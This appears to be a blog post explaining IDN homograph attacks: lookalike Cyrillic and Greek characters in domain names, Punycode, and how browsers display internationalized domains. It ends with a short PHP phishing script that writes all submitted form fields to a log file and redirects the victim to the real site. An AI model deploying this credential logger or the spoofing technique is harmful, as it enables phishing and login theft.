Dupe URLs: IDN homograph attack

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Are you receiving emails with offers from world’s most reputed Firms???
Yes..!!
Well, don’t be overwhelmed, Lad. Here is something I have for you:)

Internationalized Domain Name (IDN) homograph attacks, the kind of spoofing attack where a site address looks legitimate but is not what it seems because a character or characters has been substituted deceptively (a technique very commonly used in phishing). This kind of spoofing attack is also known as script spoofing.

In IDN homograph attack hackers are using similar looking characters from Greek, Latin or Cyrillic characters set.Their incorrect or malicious usage is a possibility for security attacks.

GOOGLE.COM

GOΟGLE.CОM

In case you are wondering,2nd one is the fake one but you can’t recognize it with your bare eyes.

Simple homograph attacks:

In simple homograph attack, a fake URL make consist of simple alphanumeric character,
Hackers usually use similar looking symbols,i.e. I(i) with l(L), o with 0,g with q.

idn2

Output:

idn1

Non-ASCII URLs:

Non-English characters in URLs; This feature was added in 2003 due to a high number
of Non-English speaking people that were using the Internet.This feature allowed to register  and use domain names which can be understood by non-English speaking people;
web addresses with the combination of ASCII and non-ASCII characters.
idn4

Security:

All non-Latin addresses need to be encoded in a special way to be handled by DNS servers. This format is known as Punycode and all browsers translate non-ASCII URLs into Punycode in the background before performing a DNS lookup. A Punycode domain name always starts from xn-- and then contains ASCII characters of the original address followed by encoded Unicode data. For instance, the latter address from the example above will be encoded in the following form:
idn5
Such domain names that contain letters from different alphabets are called Internationalized Domain Names (IDNs). They are handled in various ways by different web browsers. Usually every producer implements his own algorithms for determining the display format of requested URLs and usually, one of two solutions (with some minor modifications) is preferred:

  • Display all URL characters using Unicode,
  • Display all URL characters using Unicode if and only if all the characters belong to the same language that is chosen by user settings; display Punycode URL otherwise.

php script used for phishing:

<?php
header (‘Location: http://www.<target>.com’);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top